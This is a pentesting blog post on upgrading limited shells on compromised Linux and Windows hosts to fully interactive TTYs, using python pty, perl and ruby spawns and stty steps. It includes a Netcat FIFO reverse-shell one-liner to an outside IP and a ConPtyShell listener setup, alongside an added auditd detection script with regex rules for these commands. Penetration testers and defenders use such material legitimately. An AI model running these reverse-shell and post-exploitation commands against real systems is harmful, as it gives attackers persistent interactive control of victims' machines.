Upgrading an Autocomplete TTY Shell on Linux and Windows: A Guide for Pentesters

Introduction

When working with command-line interfaces on compromised machines, it is common to be limited to basic TTY shells that lack essential features like autocomplete and history. Upgrading these shells can significantly improve usability and efficiency during post-exploitation. This guide covers methods to upgrade TTY shells on both Linux and Windows targets to provide functionalities such as command history and tab completion, making them easier to work with.

Verify Installed Language(s)

Before attempting to upgrade or interact with shells, it’s important to verify which interpreters and shells are available on the target system. This helps determine the best approach to proceed. Here’s how to check which interpreters or shells are installed:

# Check if Python is installed and its location
which python    # Output will show the path if Python 2.x is installed

# Check for Python 3 installation
which python3   # Output will show the path if Python 3.x is installed

# Verify if Bash is available
which bash      # Output will show the path if Bash is installed

# Check for PowerShell on a Linux machine (if applicable)
which pwsh      # This shows if PowerShell Core is available on Linux

# On Windows, use 'where' (the Command Prompt equivalent of 'which');
# in PowerShell call where.exe, because 'where' is an alias for Where-Object
where python
where python3
where bash

Examples

Below are commands to help upgrade the basic TTY shell:

# Use Python 3 to spawn an upgraded shell
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Use Python 2 to spawn an upgraded shell
python -c 'import pty; pty.spawn("/bin/bash")'

# Alternative approach with os.system
python3 -c 'import os; os.system("/bin/bash")'

# Spawn an interactive shell with /bin/sh
/bin/sh -i

# Use Perl to execute a shell
perl -e 'exec "/bin/sh";'

# Use Ruby to execute a shell
ruby -e 'exec "/bin/sh"'

If Python Isn’t Installed, Use:

# Use the script command to spawn an upgraded shell
script /dev/null -c bash
/usr/bin/script -qc /bin/bash /dev/null

Reverse Shell Example

# Simple reverse shell using Netcat
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.xxx.xxx 9001 >/tmp/f
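
Seen from the defending side, each of the commands above shows up as a process execution that can be logged and matched. The following is an added example, not part of the original post: it decodes auditd EXECVE records and checks them against the upgrade commands listed here. The sample records are constructed and the rule names are hypothetical.

```python
import re

# Constructed auditd EXECVE records (not from the page). auditd quotes simple
# arguments and hex-encodes any argument containing spaces or double quotes.
SAMPLE = [
    'type=EXECVE msg=audit(1700000000.101:901): argc=3 a0="python3" a1="-c" '
    'a2=696D706F7274207074793B207074792E737061776E28222F62696E2F626173682229',
    'type=EXECVE msg=audit(1700000000.202:902): argc=4 a0="/usr/bin/script" '
    'a1="-qc" a2="/bin/bash" a3="/dev/null"',
    'type=EXECVE msg=audit(1700000000.303:903): argc=2 a0="/bin/sh" a1="-i"',
    'type=EXECVE msg=audit(1700000000.404:904): argc=3 a0="ls" a1="-la" a2="/tmp"',
]

# One rule per upgrade technique listed above; rule names are hypothetical.
RULES = {
    "python_pty_spawn": re.compile(r"\bpython[\d.]*\s.*\bpty\.spawn\("),
    "script_pty": re.compile(r"(^|/)script\s(?=.*/dev/null)(?=.*(?<!\S)-\w*c\b)"),
    "perl_ruby_exec_sh": re.compile(r"\b(perl|ruby)\s+-e\s.*\bexec\b.*/bin/(ba)?sh"),
    "interactive_sh": re.compile(r"(^|/)(ba)?sh\s+-i\b"),
}

# aN="value" (quoted) or aN=HEX (hex-encoded); "argc=" is not matched.
ARG = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')

def execve_cmdline(record):
    """Rebuild the command line from one EXECVE record, decoding hex arguments."""
    args = {}
    for idx, quoted, hexed in ARG.findall(record):
        if hexed:
            args[int(idx)] = bytes.fromhex(hexed).decode("utf-8", "replace")
        else:
            args[int(idx)] = quoted
    return " ".join(args[i] for i in sorted(args))

def detect(record):
    """Return (matched rule names, decoded command line) for one record."""
    cmd = execve_cmdline(record)
    return [name for name, rx in RULES.items() if rx.search(cmd)], cmd

if __name__ == "__main__":
    for rec in SAMPLE:
        hits, cmd = detect(rec)
        print(f"{','.join(hits) or '-':18} {cmd}")
```

A plain text search for `pty.spawn` misses the first record because the argument is hex-encoded. The Netcat FIFO one-liner never appears as a single EXECVE record, since each pipeline stage is its own process; its `/bin/sh -i` stage is what the `interactive_sh` rule matches.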

Steps to Get an Autocomplete Shell

  1. After choosing one of the methods above to upgrade your TTY shell, suspend it using:

     ctrl-z

  2. On the attacker’s machine, run:

     stty raw -echo
     stty -a  # Verify current terminal settings

  3. Bring the shell to the foreground:

     fg
     stty raw -echo; fg

  4. On the victim’s machine, configure the shell:

     stty rows $x columns $y  # Set the remote shell to x rows and y columns (the values stty -a reports for your local terminal)
     export TERM=xterm-256color  # Allows you to clear the console and have color output

  5. Press Enter twice to reactivate the session.

Now you should have a shell with autocomplete, history, and better usability features.

To have autocomplete on a Windows machine, you can also use:

A simple guide to how you could use it:

To upgrade to an advanced shell on a Windows target using PowerShell, you can leverage the ConPtyShell method. Below is an example workflow for hosting and running the script:

On Kali Linux (Attacker’s Machine)

# Host the PowerShell script (Invoke-ConPtyShell.ps1)
python3 -m http.server 80

# In another terminal on Kali
stty raw -echo; (stty size; cat) | nc -lvnp 9001

To have autocomplete on a Linux machine, you can also use:

# Clone the repo, go to the directory and use the command:
./penelope.py 5555 -i eth0

# For more guidance, go to the repo.

Conclusion

Upgrading to a TTY shell with autocomplete makes working on target systems much easier for pentesters. It helps you type commands faster, find past commands quickly, and move around more efficiently. This saves time and reduces mistakes, making the job smoother and simpler. Whether you’re working on Linux or Windows, having an upgraded shell makes interacting with the system more comfortable and productive.

This post is licensed under CC BY 4.0 by the author.